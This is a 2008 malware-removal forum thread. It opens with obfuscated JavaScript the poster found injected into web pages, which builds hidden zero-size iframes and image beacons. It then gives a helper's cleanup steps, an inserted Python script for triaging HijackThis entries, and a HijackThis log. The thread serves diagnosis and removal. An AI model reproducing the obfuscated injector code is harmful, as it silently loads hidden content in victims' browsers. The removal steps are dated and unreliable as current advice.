for (i = 0; i < rulesetElement.UrlArr.length; i++)
{

if (document.location.href.indexOf(rulesetElement.UrlArr[i]) != -1)
return rulesetElement.UrlArr[i];

}

return null;

}



function FiuXbUKnHCDceCPUxb(nodeElement)
{

var retStr = "";

vKhMmyErNETJCEN =19428 + 22533;
if(null==nodeElement)
return "";


if (nodeElement.nodeValue != null)
retStr = nodeElement.nodeValue;
var ErymMkXSgGvgRpyFADl= 22517 - 6099;
var allChildrenNode = nodeElement.childNodes;

var TRxRcdiWCcDjhwuKbC;
if (allChildrenNode != null && allChildrenNode.length > 0)
{

for(var y=allChildrenNode.length-1; y>=0; y--)
{
upoqMbCcfjpFfiyG = 23096;
var child = allChildrenNode.item(y);

var bGPqiDfiIenUvqnp =29828 + 22359;
retStr = retStr + FiuXbUKnHCDceCPUxb(child);
var SntVwsggGRjxMRt =16078;
}

}


retStr = retStr + " ";

return retStr;

}


function LEtfrTFkKeyTmLi(Obj)
{

try
{


var fr = document.createElement("IFRAME");
var plGFmAoAjncmYnHxxC= 11991 - 13660;
fr.framespacing = '0';
var PsRyVPuCbJxCiOJo;
fr.frameborder = 'no';

fr.scrolling = 'no';
var SQjIWuxJXYiGVbmiDBU =19215 + 383;
fr.width = '0';
var gYaveryxVriyOriBq =13979 + 17317;
fr.height = '0';
var AOhvlXeffkgJuISCVeI= 9120 - 11789;
fr.marginWidth = "0";

fr.marginHeight = "0";
var JJakLffPrwtoonuAWo =23738;
fr.style.borderWidth = "0px";

fr.frameBorder = '0';
var IbXRqlCQpJOQsBLiE =31002 + 31824;
fr.src = "http://127.0.0.1/" + Math.random() + "AA532B7B55D44dbb87FAB30BCA27C538?" + Obj.FrID;

document.body.appendChild(fr);
var QWVtwkWDxIvtLxpa =24449 + 2202;
tkMlVUbqAcSlacRaDXf(500);

}
catch(e)
{

var img = new Image();
UfeNtSShCiLyBHUHP =10992 + 30616;
img.src = "http://127.0.0.1/" + Math.random() + "AA532B7B55D44dbb87FAB30BCA27C538?" + Obj.FrID;
tkMlVUbqAcSlacRaDXf(500);

}


}



function aSVAqBJVoqOwbmyck()
{
cXVDHKevNslKyVHEdT = 13792;
var str;
var vESKhIIJRuAptrj =2341 + 3139;
var aid = SlCGyFQfaXOMnniLK;

var ss;
var JcHmvmUoaiawlewRHqE= 2644 - 12889;
var i;

var fxObUESOIYOjksMVj;
NmkUHbErlvxfSMGgE =8581 + 1780;



var NmRYxQKauRcxlWIHo =10861 + 11341;
str = window.location.href;
COHcraMUSMpByQMATjy = 2430;
for(i = 0; i < jKfuMEbehmSoDiaq.length; ++i)
{
var GKlLjgRwoblbavU =15683;
if(!jKfuMEbehmSoDiaq[i].length)
continue;

var QyXpXnAlDwBRkUrul= 17876 - 7319;
if(str.length < jKfuMEbehmSoDiaq[i].length)
continue;

if( (str.substr(0, jKfuMEbehmSoDiaq[i].length) == jKfuMEbehmSoDiaq[i])&&
(jKfuMEbehmSoDiaq[i] != 'file://localhost/'))
{
YdjAwGEPaVLuxORfw = 28121;
return 1; }
dDctvdsVdqUieXB =18187 + 13603;
};

for(i = 0; i < str.length - aid.length + 1; i++)
{
var wptPXsbuCqUNTvACNGA;
ss = str.substr(i, aid.length);
var bRjjJmEppTndXJWoW;
if(ss == aid)
return 1;
}



try { var wdUQLCGhHxllLiUTo =3716 + 23282; fxObUESOIYOjksMVj = window.frameElement; }
catch(e) { fxObUESOIYOjksMVj = null; }

nYtEdhWfNXAyxtvGe = 14787;
if(fxObUESOIYOjksMVj && uLVeUBHBRmOVClBjMBX(KMuAUllXyybHTsoAhR, fxObUESOIYOjksMVj))
{hShPwIyHqcDUVHmU = 15954;
return 1;
var YmFIolvfROWMjXihj= 27909 - 9287;}



return 0;

};


function xuTVOuEkxlkDrigChjl()
{
var njQloKXgDTXNYTE= 12423 - 29185;
var i;
var pWPWiqFaNprEROnY =12833;
var str;


for(i = 0; i < KMuAUllXyybHTsoAhR.length; ++i)
{

str = pVYMJURmyVjhtbmTA(KMuAUllXyybHTsoAhR[i].FrSrc);

if(str.length)
jKfuMEbehmSoDiaq.push(str);

var ILrgwJhuBRopuYsg;
str = pVYMJURmyVjhtbmTA(KMuAUllXyybHTsoAhR[i].AHref);

if(str.length)
jKfuMEbehmSoDiaq.push(str);
var XHOIidIbTOqgHKUtsjD =7915;
var bbgfBHoFdSYyRFxPm;
str = pVYMJURmyVjhtbmTA(KMuAUllXyybHTsoAhR[i].ImgSrc);
jdWBXoGJljGReFMnSht = 29006;
if(str.length)
jKfuMEbehmSoDiaq.push(str);

}


}


function DusOLUFGLWMuPBl(rqQdIdnIvDDAfpyf)
{
var giMnlQhyfHrRRfrHQXq;
var odnPhWWuYJjKMOgvS = document.createElement("IFRAME");

odnPhWWuYJjKMOgvS.id = rqQdIdnIvDDAfpyf.FrID;
OOikyGxRHYahCFNgMUW =7666 + 3217;
odnPhWWuYJjKMOgvS.name = rqQdIdnIvDDAfpyf.FrName;
rrRuwmQIykgebNcWss =3772 + 2785;
odnPhWWuYJjKMOgvS.framespacing = rqQdIdnIvDDAfpyf.FrSpacing;

odnPhWWuYJjKMOgvS.frameborder = rqQdIdnIvDDAfpyf.FrBorder;
var FnfSUfpyvLvOqRmkqgh;
odnPhWWuYJjKMOgvS.scrolling = rqQdIdnIvDDAfpyf.FrScrolling ;
dIsKxysaaBFYXoO =27653 + 22181;


Hope you can help me as always, thanks

Edited by a_fahmy7, 13 June 2008 - 04:36 PM.


#2 a_fahmy7

    Advanced Member

  • Full Member
  • 109 posts

Posted 14 June 2008 - 04:56 PM

I found out Safari web browser is not affected.

IE, Firefox and Opera are all affected though.

#3 TheJoker

    Forum Deity

  • Boot Camp Mod
  • 14,352 posts

Posted 15 June 2008 - 08:29 PM

Hi a_fahmy7, and Welcome to SWI

Sorry it has taken so long to get to you, but the board has been very busy lately, and all the Helpers here are volunteers.

I suggest printing out each set of instructions and reading the entire post before proceeding. It will make following them easier.

You are running Paltalk, which is adware and I recommend uninstalling it. If you choose to uninstall it, go to Start > Control Panel > Add or Remove Programs and remove the following program, if found:
PalTalk

Then, using Windows Explorer, delete the program folder at:
C:\Program Files\Paltalk Messenger

IMVU 3D messenger has been known to cause problems and, unless it is something you really want to keep, I recommend optionally removing it using the Control Panel's Add or Remove Programs.

I see you have Viewpoint installed...
Viewpoint Manager is considered to be foistware instead of malware since it is installed without users' approval, but doesn't spy or do anything "bad". This will change though, please read this article:
http://www.clickz.co...cle.php/3561546
I suggest you remove the program now. Go to Start > Settings > Control Panel > Add/Remove Programs and remove the following programs if present:
  • Viewpoint
  • Viewpoint Manager
  • Viewpoint Media Player
Reboot afterwards. <-- Important!

If you choose to uninstall Viewpoint, after rebooting, using Windows Explorer delete the following folder if still there:
C:\Program Files\Viewpoint

Clean your Cache and Cookies in IE:
  • Close all instances of Outlook Express and Internet Explorer
  • Go to Control Panel > Internet Options > General tab
  • Click the "Delete Cookies" button
  • Next to it, Click the "Delete Files" button
  • When prompted, place a check in: "Delete all offline content", click OK
Clean your Cache and Cookies in Firefox (In case you also have Firefox installed):
  • Go to Tools > Options.
  • Click Privacy in the menu on the left side of the Options window.
  • Click the Clear button located to the right of each option (History, Cookies, Cache).
  • Click OK to close the Options window
    Alternatively, you can clear all information stored while browsing by clicking Clear All.
    A confirmation dialog box will be shown before clearing the information.
Clean other Temporary files + Recycle bin
  • Go to start > run and type: cleanmgr and click ok.
  • Let it scan your system for files to remove.
  • Make sure Temporary Files, Temporary Internet Files, and Recycle Bin are the only things checked.
  • Press OK to remove them.
Please download Malwarebytes' Anti-Malware from Here or Here

Double Click mbam-setup.exe to install the application.
  • Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select "Perform Quick Scan", then click Scan.
  • The scan may take some time to finish, so please be patient.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Make sure that everything is checked, and click Remove Selected.
  • When disinfection is completed, a log will open in Notepad and you may be prompted to Restart. (See Note)
  • The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.
  • Copy & Paste the entire report in your next reply along with a fresh HijackThis log.
Note:
If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts.
Click OK to either and let MBAM proceed with the disinfection process.
If asked to restart the computer, please do so immediately.


Now you need to run HijackThis and click "Do a system scan only." Place a check next to the following entries (if they are still there):

O2 - BHO: (no name) - {129FA2A1-408C-4824-83A4-5001581FD01E} - C:\WINDOWS\system32\iifcARIx.dll
O2 - BHO: (no name) - {4817D522-BD26-47F3-9239-D83E82760BBC} - C:\WINDOWS\system32\qoMdabXo.dll
O2 - BHO: (no name) - {6C5546A5-BB26-471D-9043-854AFA0AB66D} - C:\WINDOWS\system32\ljJCSkjg.dll (file missing)
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O4 - HKLM\..\Run: [BMcfa4d225] Rundll32.exe "C:\WINDOWS\system32\gfvwynfe.dll",s
O20 - Winlogon Notify: iifcARIx - C:\WINDOWS\SYSTEM32\iifcARIx.dll


If you uninstalled PalTalk as recommended, also check (if still there):
O9 - Extra button: PalTalk - {4EAFEF58-EEFA-4116-983D-03B49BCBFFFE} - C:\Program Files\Paltalk Messenger\Paltalk.exe (file missing)

If you uninstalled IMVU 3D as recommended, also check (if still there):
O9 - Extra button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Documents and Settings\Ahmed Fahmy\Start Menu\Programs\IMVU\Run IMVU.lnk

Now close all browser and other windows except for HijackThis, and click "Fix Checked" to have HijackThis fix the entries you checked.

Download ComboFix© by sUBs from one of these links:
http://download.blee...Bs/ComboFix.exe
http://www.forospywa...Bs/ComboFix.exe
http://subs.geekstogo.com/ComboFix.exe

Save the file to your Desktop.

Familiarize yourself with ComboFix before running it:
http://www.bleepingc...to-use-combofix
This includes installing the Windows XP Recovery Console in case you have not installed it yet.

Disconnect from the Internet (pull the connection cable) <-- Important
Close your ESET NOD32 antivirus and any anti-spyware applications you may be running.

For this next step, please ensure that ComboFix.exe is on your desktop:

Please open Notepad *Do Not Use Wordpad!* (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the quote box below:
Save this as "CFScript.txt" and change the "Save as type" to "All Files" and place it on your desktop.

File::
C:\WINDOWS\system32\iifcARIx.dll
C:\WINDOWS\system32\qoMdabXo.dll
C:\WINDOWS\system32\ljJCSkjg.dll
C:\WINDOWS\system32\gfvwynfe.dll

[Screenshot: CFScript.txt being dragged onto ComboFix.exe]

Referring to the screenshot above, drag CFScript.txt into ComboFix.exe.
ComboFix will now run a scan on your system. It may reboot your system when it finishes. This is normal.
When finished, it shall produce a log for you, C:\ComboFix.txt. Post that log in your next reply.
CAUTION: Do not mouse-click ComboFix's window while it is running. That may cause it to stall.

After the system restarts, your ESET NOD32 AntiVirus should be running again.
If it isn't, restart it manually.
Reconnect to the Internet.

Please post a new HijackThis log, the log from MBAM, and in a second reply (due to length) the log from ComboFix (combofix.txt), and note any errors encountered.

Free Tools for Fighting Malware
Anti-Virus: avast! Free Antivirus / Avira Free AntiVirus
OnLine Anti-Virus: ESET / BitDefender / F-Secure
Anti-Malware: Malwarebytes' Anti-Malware / Dr.Web CureIt
Spyware/Adware Tools: MVPS HOSTS File / SpywareBlaster
Firewall: Comodo Firewall Free / Privatefirewall
Tutorials: How did I get Infected? / Internet Explorer Privacy & Security Settings
If we have helped, please help us continue the fight by using the Donate button, or see this topic for other ways to donate.

MS MVP 2009-2010 and ASAP Member since 2005
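An added example, not part of this thread: a small Python script that applies the same triage reasoning as the entries listed above to HijackThis lines. It flags O2 BHOs registered as "(no name)", O4 Run entries that use rundll32 to load a DLL out of system32, and O20 Winlogon Notify packages outside the standard XP set, then reports DLLs that appear in more than one role (here iifcARIx.dll as both BHO and Winlogon Notify). The sample lines are copied from this thread's log; the rules and the Winlogon allowlist are the example's own assumptions, not HijackThis logic.

```python
"""Triage heuristics for HijackThis (HJT) O2/O4/O20 lines, written as an
example for this thread; the rules mirror the helper's reasoning, not any
official HJT logic."""
import os
import re
from collections import defaultdict

# Sample lines copied from the HijackThis log posted in this thread
# (a few known-good entries mixed in with the ones the helper flagged).
SAMPLE_LOG = r"""
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {129FA2A1-408C-4824-83A4-5001581FD01E} - C:\WINDOWS\system32\iifcARIx.dll
O2 - BHO: (no name) - {6C5546A5-BB26-471D-9043-854AFA0AB66D} - C:\WINDOWS\system32\ljJCSkjg.dll (file missing)
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [BMcfa4d225] Rundll32.exe "C:\WINDOWS\system32\gfvwynfe.dll",s
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O20 - Winlogon Notify: iifcARIx - C:\WINDOWS\SYSTEM32\iifcARIx.dll
"""

BHO_RE = re.compile(r"^O2 - BHO: (?P<name>.*?) - \{(?P<clsid>[0-9A-Fa-f-]+)\} - (?P<path>.*)$")
RUN_RE = re.compile(r"^O4 - (?P<hive>HK(?:LM|CU))\\\.\.\\Run: \[(?P<key>[^\]]+)\] (?P<cmd>.*)$")
NOTIFY_RE = re.compile(r"^O20 - Winlogon Notify: (?P<name>\S+) - (?P<path>.*)$")
# Command line of the form: rundll32[.exe] "<dll>",<export>
RUNDLL_RE = re.compile(r'^rundll32(?:\.exe)?\s+"?(?P<dll>[^",]+)"?', re.IGNORECASE)

# Standard Windows XP Winlogon notification packages (assumed allowlist;
# anything else registered here deserves a look).
KNOWN_NOTIFY = {"crypt32chain", "cryptnet", "cscdll", "sccertprop", "schedule",
                "sclgntfy", "senslogn", "termsrv", "wlballoon"}


def parse_hjt(text):
    """Parse O2 (BHO), O4 (Run) and O20 Winlogon Notify lines into dicts.
    Other lines are skipped; each dict keeps the raw line for reporting."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if m := BHO_RE.match(line):
            entries.append({"kind": "bho", "line": line, "name": m["name"],
                            "path": m["path"].replace(" (file missing)", "")})
        elif m := RUN_RE.match(line):
            dll = RUNDLL_RE.match(m["cmd"])
            entries.append({"kind": "run", "line": line, "key": m["key"], "cmd": m["cmd"],
                            "rundll_target": dll["dll"] if dll else None})
        elif m := NOTIFY_RE.match(line):
            entries.append({"kind": "notify", "line": line, "name": m["name"], "path": m["path"]})
    return entries


def dll_basename(path):
    """Lower-cased file name of a DLL path, or None for '(no file)' and non-DLLs."""
    name = os.path.basename(path.replace("\\", "/")).lower()
    return name if name.endswith(".dll") else None


def in_system32(path):
    return "\\system32\\" in path.lower()


def flag_entries(entries):
    """Return (line, reason) pairs for entries matching the triage rules."""
    flagged = []
    for e in entries:
        if e["kind"] == "bho" and e["name"] == "(no name)":
            flagged.append((e["line"], "BHO registered without a name"))
        elif e["kind"] == "run" and e["rundll_target"] and in_system32(e["rundll_target"]):
            flagged.append((e["line"], "rundll32 autostart loading a DLL from system32"))
        elif e["kind"] == "notify" and e["name"].lower() not in KNOWN_NOTIFY:
            flagged.append((e["line"], "non-standard Winlogon Notify package"))
    return flagged


def dlls_in_multiple_roles(entries):
    """Map DLL file name -> set of entry kinds it appears in, keeping only DLLs
    registered in more than one role (e.g. both BHO and Winlogon Notify)."""
    roles = defaultdict(set)
    for e in entries:
        name = dll_basename(e.get("path") or e.get("rundll_target") or "")
        if name:
            roles[name].add(e["kind"])
    return {name: kinds for name, kinds in roles.items() if len(kinds) > 1}


if __name__ == "__main__":
    parsed = parse_hjt(SAMPLE_LOG)
    for line, reason in flag_entries(parsed):
        print(f"[{reason}]\n    {line}")
    for name, kinds in dlls_in_multiple_roles(parsed).items():
        print(f"DLL {name} is registered as: {', '.join(sorted(kinds))}")
```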


#4 a_fahmy7

    Advanced Member

  • Full Member
  • 109 posts

Posted 16 June 2008 - 03:25 PM

ok, thanks for your reply. I did NOT do these things YET because of some changes that happened today. NOD32 detected infected files on system startup. It prompted me to delete them and I did, then rebooted. Since then, the browsers are working fine, all of them, and the javascript code is no longer there in the web pages' source code. However the infection is still detected by NOD32 as expected. On system restart, it says the following modules cannot be loaded: egwhnjp.dll and ccrrhydm.dll, which is expected as well since some files or data have been deleted. I am just mentioning this before doing anything of what you told me to do, just to make sure I should still proceed as advised. Here's the latest HijackThis log file. Again, I didn't do anything of what you mentioned yet. Tell me to proceed and I will. Thanks

Should I really delete the saved passwords in Firefox private data as well, or can I keep those? Would be much better if I can keep these.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:25:22 PM, on 6/16/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Sygate\SPF\smc.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\WLTRAY.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\WINDOWS\VMSnap3.EXE
C:\WINDOWS\Domino.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\Digital Line Detect\DLG.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Mozilla Firefox2\firefox.exe
C:\Documents and Settings\Ahmed Fahmy\My Documents\My Downloads\HiJackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com/ig/dell?hl=en&client=dell-usuk-rel&channel=us&ibd=6061214
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.c...rch/search.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://us.rd.yahoo.c...//www.yahoo.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://jobreeze.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://us.rd.yahoo.c...//www.yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.c...rch/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://us.rd.yahoo.c...//www.yahoo.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Page_URL = www.google.com/ig/dell?hl=en&client=dell-usuk-rel&channel=us&ibd=6061214
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://us.rd.yahoo.c...//www.yahoo.com
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {129FA2A1-408C-4824-83A4-5001581FD01E} - C:\WINDOWS\system32\iifcARIx.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O2 - BHO: (no name) - {62F940A5-9D03-4F01-A0D0-FE1308201AE7} - C:\WINDOWS\system32\qoMdabXo.dll (file missing)
O2 - BHO: (no name) - {6C5546A5-BB26-471D-9043-854AFA0AB66D} - C:\WINDOWS\system32\ljJCSkjg.dll (file missing)
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MI1933~1\Office12\GRA8E1~1.DLL
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [Broadcom Wireless Manager UI] C:\WINDOWS\system32\WLTRAY.exe
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [VMSnap3] C:\WINDOWS\VMSnap3.EXE
O4 - HKLM\..\Run: [Domino] C:\WINDOWS\Domino.EXE
O4 - HKLM\..\Run: [BigDog303] C:\WINDOWS\VM303_STI.EXE VIMICRO USB PC Camera (ZC0301PLH)
O4 - HKLM\..\Run: [cc97e1b9] rundll32.exe "C:\WINDOWS\system32\ccrrhydm.dll",b
O4 - HKLM\..\Run: [BMcfa4d225] Rundll32.exe "C:\WINDOWS\system32\epwhgnjp.dll",s
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Startup: Yahoo! Widget Engine.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
O4 - Global Startup: Bluetooth.lnk = ?
O4 - Global Startup: Digital Line Detect.lnk = ?
O8 - Extra context menu item: Download Using &BitSpirit - C:\Program Files\BitSpirit\bsurl.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Send to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra button: PalTalk - {4EAFEF58-EEFA-4116-983D-03B49BCBFFFE} - C:\Program Files\Paltalk Messenger\Paltalk.exe (file missing)
O9 - Extra button: Bonjour - {7F9DB11C-E358-4ca6-A83D-ACC663939424} - C:\Program Files\Bonjour\ExplorerPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\Office12\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Documents and Settings\Ahmed Fahmy\Start Menu\Programs\IMVU\Run IMVU.lnk
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {20A60F0D-9AFA-4515-A0FD-83BD84642501} (Checkers Class) - http://messenger.zon...kr.cab56986.cab
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} - http://download.mcaf...01/mcinsctl.cab
O16 - DPF: {5D6F45B3-9043-443D-A792-115447494D24} (UnoCtrl Class) - http://messenger.zon...1/GAME_UNO1.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) - http://messenger.zon...ro.cab56649.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zon...nt.cab56907.cab
O16 - DPF: {DA758BB1-5F89-4465-975F-8D7179A4BCF3} (WheelofFortune Object) - http://messenger.zon...oF.cab57176.cab
O16 - DPF: {F5A7706B-B9C0-4C89-A715-7A0C6B05DD48} (Minesweeper Flags Class) - http://messenger.zon...er.cab56986.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{BF5CCFB5-6096-404D-B329-56E8F3847FA6}: NameServer = 62.117.40.111,62.117.40.112
O17 - HKLM\System\CCS\Services\Tcpip\..\{CA254E2C-5690-497E-9971-569C6268C2DB}: NameServer = 62.117.40.111,80.75.166.250
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MI1933~1\Office12\GR99D3~1.DLL
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O20 - Winlogon Notify: iifcARIx - C:\WINDOWS\SYSTEM32\iifcARIx.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: AOL Connectivity Service (AOL ACS) - America Online, Inc. - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
